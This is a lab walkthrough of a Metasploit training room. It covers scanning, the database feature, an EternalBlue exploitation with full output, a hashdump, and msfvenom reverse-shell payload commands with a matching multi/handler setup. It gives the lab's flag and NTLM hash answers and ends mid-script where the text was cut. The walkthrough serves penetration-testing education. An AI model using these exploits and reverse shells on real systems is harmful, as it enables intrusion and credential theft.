Introduction
In this room, we will learn how to use Metasploit for vulnerability scanning and exploitation.
We will also cover how the database feature makes it easier to manage penetration testing engagements with a broader scope.
Finally, we will look at generating payloads with msfvenom and how to start a Meterpreter session on most target platforms.
More specifically, the topics we will cover are:
- How to scan target systems using Metasploit.
- How to use the Metasploit database feature.
- How to use Metasploit to conduct a vulnerability scan.
- How to use Metasploit to exploit vulnerable services on target systems.
- How msfvenom can be used to create payloads and obtain a Meterpreter session on the target system.
Scanning
Port Scanning
Metasploit has a number of modules to scan open ports on the target system and network. You can list potential port scanning modules available using the search portscan command.
msf6 > search portscan
Port scanning modules will require you to set a few options:
msf6 auxiliary(scanner/portscan/tcp) > show options
Module options (auxiliary/scanner/portscan/tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
DELAY 0 yes The delay between connections, per thread, in milliseconds
JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
THREADS 1 yes The number of concurrent threads (max one per host)
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf6 auxiliary(scanner/portscan/tcp) >
- CONCURRENCY: Number of ports checked concurrently on each host (not the number of targets; see the option description above).
- PORTS: Port range to be scanned. Please note that the default 1-10000 here is not the same as an Nmap scan with the default configuration. Nmap will scan the 1000 most used ports, while this module will scan every port number from 1 to 10000.
- RHOSTS: Target or target network to be scanned.
- THREADS: Number of threads that will be used simultaneously (at most one per host). More threads will res
You can also run Nmap directly from the msfconsole prompt, which is usually faster than the portscan modules:
msf6 > nmap -sS 10.10.12.229
As with information gathering, if your engagement requires a speedier approach to port scanning, Metasploit may not be your first choice. However, a number of modules make Metasploit a useful tool for the scanning phase.
UDP Service Identification
The scanner/discovery/udp_sweep module will allow you to quickly identify services running over the UDP (User Datagram Protocol).
As you can see below, this module will not conduct an extensive scan of all possible UDP services but does provide a quick way to identify services such as DNS or NetBIOS.
msf6 auxiliary(scanner/discovery/udp_sweep) > run
[*] Sending 13 probes to 10.10.12.229->10.10.12.229 (1 hosts)
[*] Discovered NetBIOS on 10.10.12.229:137 (JON-PC::U :WORKGROUP::G :JON-PC::U :WORKGROUP::G :WORKGROUP::U :__MSBROWSE__::G :02:ce:59:27:c8:e3)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/discovery/udp_sweep) >
SMB Scans
Metasploit offers several useful auxiliary modules that allow us to scan specific services.
Below is an example for the SMB (Server Message Block).
Especially useful in a corporate network would be smb_enumshares and smb_version, but please spend some time identifying which scanners the Metasploit version installed on your system offers.
msf6 auxiliary(scanner/smb/smb_version) > run
[+] 10.10.12.229:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:JON-PC) (workgroup:WORKGROUP ) (signatures:optional)
[*] 10.10.12.229:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) >
Answer the questions
How many ports are open on the target system?
msf > nmap -sS 10.10.42.106
Answer: 5
Using the relevant scanner, what NetBIOS name can you see?
msf > search NetBios
msf > use auxiliary/scanner/netbios/nbname
msf > setg RHOSTS 10.10.42.106
msf > run
Answer: ACME IT SUPPORT
What is running on port 8000?
msf > nmap -A 10.10.42.106
Answer: webfs/1.21
What is the "penny" user's SMB password? Use the wordlist mentioned in the previous task.
msf > search name:smb description:login
msf > use auxiliary/scanner/smb/smb_login
msf > setg RHOSTS 10.10.42.106
msf > set SMBUser penny
msf > set PASS_FILE /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
msf > run
Answer: the password that smb_login reports as a successful login for the penny user.
The Metasploit Database
Metasploit has a database function to simplify project management and avoid possible confusion when setting up parameter values.
systemctl start postgresql
sudo -u postgres msfdb init
You can now launch msfconsole and check the database status using the db_status command.
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 >
The database feature will allow you to create workspaces to isolate different projects.
When first launched, you should be in the default workspace.
- workspace: list available workspaces
- workspace -a tryhackme: add a workspace
- workspace -d tryhackme: delete a workspace
- workspace -r tryhackme tryhackme2: rename a workspace
- workspace -h: list available options for the workspace command
Unlike regular Metasploit usage, once Metasploit is launched with a database connected, the help command will also show the Database Backend Commands menu.
Database Backend Commands
=========================
Command Description
------- -----------
analyze Analyze database information about a specific address or address range
db_connect Connect to an existing data service
db_disconnect Disconnect from the current data service
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache (deprecated)
db_remove Remove the saved data service entry
db_save Save the current data service connection as the default to reconnect on startup
db_status Show the current data service status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
If you run an Nmap scan using db_nmap as shown below, all results will be saved to the database.
msf6 > db_nmap -sV -p- 10.10.12.229
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-20 03:15 UTC
[*] Nmap: Nmap scan report for ip-10-10-12-229.eu-west-1.compute.internal (10.10.12.229)
[*] Nmap: Host is up (0.00090s latency).
[*] Nmap: Not shown: 65526 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
[*] Nmap: 3389/tcp open ssl/ms-wbt-server?
[*] Nmap: 49152/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49153/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49154/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49158/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49162/tcp open msrpc Microsoft Windows RPC
[*] Nmap: MAC Address: 02:CE:59:27:C8:E3 (Unknown)
[*] Nmap: Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 94.91 seconds
msf6 >
You can now access information relevant to hosts and services running on target systems with the hosts and services commands, respectively.
msf6 > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
10.10.12.229 02:ce:59:27:c8:e3 ip-10-10-12-229.eu-west-1.compute.internal Unknown device
msf6 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.10.12.229 135 tcp msrpc open Microsoft Windows RPC
10.10.12.229 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.10.12.229 445 tcp microsoft-ds open Microsoft Windows 7 - 10 microsoft-ds workgroup: WORKGROUP
10.10.12.229 3389 tcp ssl/ms-wbt-server open
10.10.12.229 49152 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49153 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49154 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49158 tcp msrpc open Microsoft Windows RPC
10.10.12.229 49162 tcp msrpc open Microsoft Windows RPC
msf6 >
Once the host information is stored in the database, you can use the hosts -R command to add this value to the RHOSTS parameter.
Example Workflow
- We will use the vulnerability scanning module that finds potential MS17-010 vulnerabilities with the use auxiliary/scanner/smb/smb_ms17_010 command.
- We set the RHOSTS value using hosts -R.
- We have typed show options to check that all values were assigned correctly. (In this example, 10.10.138.32 is the IP address we scanned earlier using the db_nmap command.)
- Once all parameters are set, we launch the module using the run or exploit command.
If there is more than one host saved to the database, all IP addresses will be used when the hosts -R command is used.
In a typical penetration testing engagement, we could have the following scenario:
- Finding available hosts using the db_nmap command
- Scanning these for further vulnerabilities or open ports (using a port scanning module)
The services command used with the -S parameter will allow you to search for specific services in the environment.
msf6 > services -S netbios
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.10.12.229 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
msf6 >
You may want to look for low-hanging fruit such as:
- HTTP: Could potentially host a web application where you can find vulnerabilities like SQL injection or Remote Code Execution (RCE).
- FTP: Could allow anonymous login and provide access to interesting files.
- SMB: Could be vulnerable to SMB exploits like MS17-010
- SSH: Could have default or easy to guess credentials
- RDP: Could be vulnerable to Bluekeep or allow desktop access if weak credentials were used.
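The workflow above (db_nmap into the database, then let the database set RHOSTS instead of retyping targets) can be captured in a Metasploit resource script and replayed with msfconsole -r. The following is an added example, not part of the original room: a POSIX shell function that generates such a script for the low-hanging-fruit services just listed. It uses services -p PORT -u -R rather than hosts -R, so each scanner module only receives the hosts that actually have that port open; as noted above, hosts -R would hand every host in the workspace to every module. The workspace name, target range and the port-to-module pairs are illustrative assumptions; the modules named are real Metasploit modules, but confirm with search that your installed version has them.

```shell
#!/bin/sh
# Added example (not from the original room). Generate a Metasploit resource
# script (.rc) that scans a range with db_nmap, then points each scanner
# module only at the hosts that expose its port, using the database.
#
# Usage:  gen_scan_rc WORKSPACE TARGETS "PORT:MODULE PORT:MODULE ..." > scan.rc
#         msfconsole -q -r scan.rc
# All names, ranges and port/module pairs below are illustrative assumptions.

gen_scan_rc() {
    ws="$1"; targets="$2"; checks="$3"

    # Collect the ports we care about so db_nmap only touches those.
    ports=""
    for pair in $checks; do
        port="${pair%%:*}"
        ports="${ports:+$ports,}$port"
    done

    # A dedicated workspace keeps results from other engagements out of RHOSTS.
    printf 'workspace -a %s\n' "$ws"
    printf 'db_nmap -sV --open -p %s %s\n' "$ports" "$targets"

    # For each check: select the module, then let the database set RHOSTS to
    # only the hosts with that port open (-u = state open, -R = set RHOSTS).
    for pair in $checks; do
        port="${pair%%:*}"
        module="${pair#*:}"
        printf 'use %s\n' "$module"
        printf 'services -p %s -u -R\n' "$port"
        printf 'set THREADS 10\n'
        printf 'run\n'
    done

    # Anything a scanner flagged lands in the vulns table.
    printf 'vulns\n'
}

# Default checks: the low-hanging fruit listed above (SMB, FTP, RDP).
DEFAULT_CHECKS='445:auxiliary/scanner/smb/smb_ms17_010 21:auxiliary/scanner/ftp/anonymous 3389:auxiliary/scanner/rdp/cve_2019_0708_bluekeep'

if [ "$#" -ge 2 ]; then
    gen_scan_rc "$1" "$2" "${3:-$DEFAULT_CHECKS}"
fi
```

Run it as sh gen_scan_rc.sh eng1 10.10.12.0/24 > scan.rc and then msfconsole -q -r scan.rc; because the target list for each module comes from the services table, a host that only answers on 21 never gets hit by the SMB or RDP scanners.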
Vulnerability Scanning
Finding vulnerabilities using Metasploit will rely heavily on your ability to scan and fingerprint the target. The better you are at these stages, the more options Metasploit may provide you. For example, if you identify a VNC service running on the target, you may use the search function on Metasploit to list useful modules. The results will contain payload and post modules. At this stage, these results are not very useful as we have not discovered a potential exploit to use just yet. However, in the case of VNC, there are several scanner modules that we can use.
Example: VNC scanning modules (pressing Tab after use auxiliary/scanner/vnc/ lists them)
msf6 > use auxiliary/scanner/vnc/
use auxiliary/scanner/vnc/ard_root_pw
use auxiliary/scanner/vnc/vnc_login
use auxiliary/scanner/vnc/vnc_none_auth
msf6 > use auxiliary/scanner/vnc/
You can use the info command for any module to have a better understanding of its use and purpose.
Answer the questions
Who wrote the module that allows us to check SMTP servers for open relay?
msf > info auxiliary/scanner/smtp/smtp_relay
Answer: Campbell Murray
Exploitation
As the name suggests, Metasploit is an exploitation framework. Exploits are the most populated module category.
You can search exploits using the search command, obtain more information about the exploit using the info command, and launch the exploit using exploit. While the process itself is simple, remember that a successful outcome depends on a thorough understanding of the services running on the target system. Many exploit modules, ms17_010_eternalblue included, also implement a check command; run it before exploit, because a memory-corruption exploit fired against the wrong build can crash the target instead of returning a shell.
Most exploits will have a preset default payload. However, you can always use the show payloads command to list the other payloads you can use with that specific exploit.
Once you have decided on the payload, you can use the set payload command to make your choice.
Note that choosing a working payload can become a trial-and-error process because of environmental or OS restrictions such as firewall rules, anti-virus, the ability to write files, or the interpreter the payload needs not being present on the target (e.g. payload/python/shell_reverse_tcp on a host without Python).
Some payloads will expose new parameters that you may need to set; running the show options command once more will display them. As the example below shows, a reverse payload will at least require you to set the LHOST option.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.186.44
lhost => 10.10.186.44
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.10.186.44:4444
[*] 10.10.12.229:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.12.229:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.12.229:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.12.229:445 - Connecting to target for exploitation.
[+] 10.10.12.229:445 - Connection established for exploitation.
[+] 10.10.12.229:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.12.229:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.12.229:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.12.229:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.12.229:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.12.229:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.12.229:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.12.229:445 - Sending all but last fragment of exploit packet
[*] 10.10.12.229:445 - Starting non-paged pool grooming
[+] 10.10.12.229:445 - Sending SMBv2 buffers
[+] 10.10.12.229:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.12.229:445 - Sending final SMBv2 buffers.
[*] 10.10.12.229:445 - Sending last fragment of exploit packet!
[*] 10.10.12.229:445 - Receiving response from exploit packet
[+] 10.10.12.229:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.12.229:445 - Sending egg to corrupted connection.
[*] 10.10.12.229:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.10.186.44:4444 -> 10.10.12.229:49366) at 2021-08-20 04:51:19 +0100
C:\Windows\system32>
Once a session is opened, you can background it using CTRL+Z or abort it using CTRL+C. Backgrounding a session will be useful when working on more than one target simultaneously or on the same target with a different exploit and/or shell.
C:\Windows\system32>^Z
Background session 1? [y/N] y
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation... 10.10.186.44:4444 -> 10.10.12.229:49366 (10.10.12.229)
msf6 exploit(windows/smb/ms17_010_eternalblue) >
Working with sessions
The sessions command will list all active sessions. The sessions command supports a number of options that will help you manage sessions better.
You can interact with any existing session using the sessions -i command followed by the session ID.
Answer the questions
What is the content of the flag.txt file?
msfconsole
msf6 > nmap -A -nn 10.10.140.203
[*] exec: nmap -A -nn 10.10.140.203
Starting Nmap 7.80 ( https://nmap.org ) at 2025-10-18 07:45 BST
Stats: 0:00:33 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 44.44% done; ETC: 07:46 (0:00:33 remaining)
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 44.44% done; ETC: 07:47 (0:00:45 remaining)
Nmap scan report for 10.10.140.203
Host is up (0.00032s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped
|_ssl-date: 2025-10-18T06:47:24+00:00; 0s from scanner time.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
MAC Address: 02:52:21:14:0D:07 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=10/18%OT=135%CT=1%CU=36906%PV=Y%DS=1%DC=D%G=Y%M=025221
OS:%TM=68F33837%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=103%TI=I%CI=I%II
OS:=I%SS=S%TS=7)OPS(O1=M2301NW8ST11%O2=M2301NW8ST11%O3=M2301NW8NNT11%O4=M23
OS:01NW8ST11%O5=M2301NW8ST11%O6=M2301ST11)WIN(W1=2000%W2=2000%W3=2000%W4=20
OS:00%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M2301NW8NNS%CC=N%Q=)T1(R=Y
OS:%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD
OS:=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(
OS:R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F
OS:=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G
OS:%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 1 hop
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h15m00s, deviation: 2h30m00s, median: 0s
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:52:21:14:0d:07 (unknown)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-10-18T01:47:09-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-10-18T06:47:09
|_ start_date: 2025-10-18T06:33:24
TRACEROUTE
HOP RTT ADDRESS
1 0.32 ms 10.10.140.203
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 150.64 seconds
msf6 > search type:exploit smb windows 7
154 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
155 \_ target: Automatic Target . . . .
156 \_ target: Windows 7
msf6 > use 154
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name           Current Setting  Required  Description
----           ---------------  --------  -----------
RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT          445              yes       The target port (TCP)
SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass                         no        (Optional) The password for the specified username
SMBUser                         no        (Optional) The username to authenticate as
VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     10.10.199.66     yes       The listen address (an interface may be specified)
LPORT     4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.140.203
RHOSTS => 10.10.140.203
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.199.66:4444
[*] 10.10.140.203:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.140.203:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.140.203:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.140.203:445 - The target is vulnerable.
[*] 10.10.140.203:445 - Connecting to target for exploitation.
[+] 10.10.140.203:445 - Connection established for exploitation.
[+] 10.10.140.203:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.140.203:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.140.203:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.140.203:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.140.203:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.140.203:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.140.203:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.140.203:445 - Sending all but last fragment of exploit packet
[*] 10.10.140.203:445 - Starting non-paged pool grooming
[+] 10.10.140.203:445 - Sending SMBv2 buffers
[+] 10.10.140.203:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.140.203:445 - Sending final SMBv2 buffers.
[*] 10.10.140.203:445 - Sending last fragment of exploit packet!
[*] 10.10.140.203:445 - Receiving response from exploit packet
[+] 10.10.140.203:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.140.203:445 - Sending egg to corrupted connection.
[*] 10.10.140.203:445 - Triggering free of corrupted buffer.
[*] Sending stage (203846 bytes) to 10.10.140.203
[*] Meterpreter session 1 opened (10.10.199.66:4444 -> 10.10.140.203:49192) at 2025-10-18 07:59:50 +0100
[+] 10.10.140.203:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.140.203:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.140.203:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > search -f flag.txt
Found 1 result...
=================
Path Size (bytes) Modified (UTC)
---- ------------ --------------
c:\Users\Jon\Documents\flag.txt 15 2021-07-15 03:39:25 +0100
meterpreter > shell
Process 1064 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>type c:\Users\Jon\Documents\flag.txt
type c:\Users\Jon\Documents\flag.txt
THM-5455554845
C:\Windows\system32>exit
exit
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1001:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::
meterpreter >
Answer: THM-5455554845
What is the NTLM hash of the password of the user "pirate"?
Answer: 8ce9a3ebd1647fcc5e04025019f4b875
Msfvenom
Msfvenom, which replaced Msfpayload and Msfencode, allows you to generate payloads.
Msfvenom will allow you to access all payloads available in the Metasploit framework. Msfvenom allows you to create payloads in many different formats (PHP, exe, dll, elf, etc.) and for many different target systems (Apple, Windows, Android, Linux, etc.).
You can either generate stand-alone payloads (e.g. a Windows executable for Meterpreter) or get a usable raw format (e.g. python).
msfvenom -l payloads
The msfvenom --list formats command can be used to list supported output formats
Encoders
Encoders do not aim to bypass antivirus installed on the target system. As the name suggests, they encode the payload. While encoding can defeat some antivirus signatures, modern obfuscation techniques or learning how to inject shellcode yourself is a better solution to the problem.
The example below shows the usage of encoding (with the -e parameter). The PHP version of Meterpreter was encoded in Base64, and the output format was raw.
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64
Handlers
Similar to exploits using a reverse shell, you will need to be able to accept the incoming connections generated by the MSFvenom payload. When using an exploit module, this part is handled automatically by the exploit module; you will remember how the Payload options section appeared when setting a reverse shell.
The term commonly used to receive a connection from a target is 'catching a shell'. Reverse shells or Meterpreter callbacks generated in your MSFvenom payload can be easily caught using a handler.
The following scenario may be familiar, we will exploit the file upload vulnerability present in DVWA (Damn Vulnerable Web Application).
For the exercises in this task, you will need to replicate a similar scenario on another target system, DVWA was used here for illustration purposes.
The exploit steps are:
- Generate the PHP shell using MSFvenom
- Start the Metasploit handler
- Execute the PHP shell
MSFvenom will require a payload, the local machine IP address, and the local port to which the payload will connect.
Seen below, 10.0.2.19 is the IP address of the AttackBox used in the attack and local port 7777 was chosen.
msfvenom -p php/reverse_php LHOST=10.0.2.19 LPORT=7777 -f raw > reverse_shell.php
Please note: in the raw output the opening PHP tag is wrapped in a comment and there is no closing ?> tag, so inspect the file and add the tags if your upload target expects a conventional PHP file.
We will use Multi Handler to receive the incoming connection. The module can be used with the use exploit/multi/handler command.
Multi handler supports all Metasploit payloads and can be used for Meterpreter as well as regular shells.
To use the module, we will need to set the payload value (php/reverse_php in this case), the LHOST, and LPORT values.
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf6 exploit(multi/handler) > set lhost 10.0.2.19
lhost => 10.0.2.19
msf6 exploit(multi/handler) > set lport 7777
lport => 7777
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.0.2.19:7777
When the reverse shell is triggered, the connection will be received by multi/handler and provide us with a shell.
If the payload was set as Meterpreter (e.g. in a Windows executable format), multi/handler would then provide us with a Meterpreter shell.
Other Payloads
Based on the target system's configuration (operating system, installed web server, installed interpreter, etc.), msfvenom can be used to create payloads in almost all formats. Below are a few examples you will often use:
In all these examples, LHOST will be the IP address of your attacking machine, and LPORT will be the port on which your handler will listen.
Linux Executable and Linkable Format (elf)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
The .elf format is comparable to the .exe format in Windows.
These are executable files for Linux. However, you may still need to make sure they have executable permissions on the target machine.
For example, once you have the rev_shell.elf file on your target machine, use the chmod +x rev_shell.elf command to grant executable permissions.
Once done, you can run this file by typing ./rev_shell.elf on the target machine command line.
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
All of the examples above are reverse payloads. This means you will need to have the exploit/multi/handler module listening on your attacking machine to work as a handler.
You will need to set up the handler accordingly with the payload, LHOST and LPORT parameters. These values will be the same you have used when creating the msfvenom payload.
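A handler whose payload, LHOST or LPORT differ from what was baked into the msfvenom binary is the usual reason a callback arrives and no session appears (a staged payload even gets sent the wrong stage). The following is an added example, not from the original room: a POSIX shell function that takes the exact argument list you gave msfvenom and emits the matching exploit/multi/handler resource script, refusing bind payloads (which have no LHOST and are connected to, not caught) and incomplete argument sets. The IP addresses and ports in the usage comment are illustrative; set ExitOnSession false and exploit -j -z are my choices so the handler keeps listening as a background job after the first session.

```shell
#!/bin/sh
# Added example (not from the original room). Turn the argument list you gave
# msfvenom into a matching exploit/multi/handler resource script, so the
# handler's PAYLOAD, LHOST and LPORT cannot drift from the payload's.
#
# Usage:
#   sh handler_rc.sh -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=4444 -f elf > handler.rc
#   msfconsole -q -r handler.rc
# IPs and ports are illustrative.

handler_rc_from_msfvenom() {
    payload=""; lhost=""; lport=""
    while [ $# -gt 0 ]; do
        case "$1" in
            -p|--payload) payload="$2"; shift ;;
            LHOST=*)      lhost="${1#LHOST=}" ;;
            LPORT=*)      lport="${1#LPORT=}" ;;
            # msfvenom options that take a value but do not affect the handler
            -f|-e|-b|-o|-i|-a|-x|-n|-s|--platform|--encoder|--format|--out) shift ;;
        esac
        shift
    done

    if [ -z "$payload" ] || [ -z "$lport" ]; then
        echo "need -p PAYLOAD and LPORT=..." >&2; return 1
    fi
    # Only reverse payloads call back to LHOST; multi/handler cannot catch a bind payload.
    case "$payload" in
        */reverse_*) ;;
        *) echo "not a reverse payload, multi/handler would not catch it: $payload" >&2; return 2 ;;
    esac
    if [ -z "$lhost" ]; then
        echo "reverse payload without LHOST" >&2; return 1
    fi

    printf 'use exploit/multi/handler\n'
    printf 'set PAYLOAD %s\n' "$payload"
    printf 'set LHOST %s\n' "$lhost"
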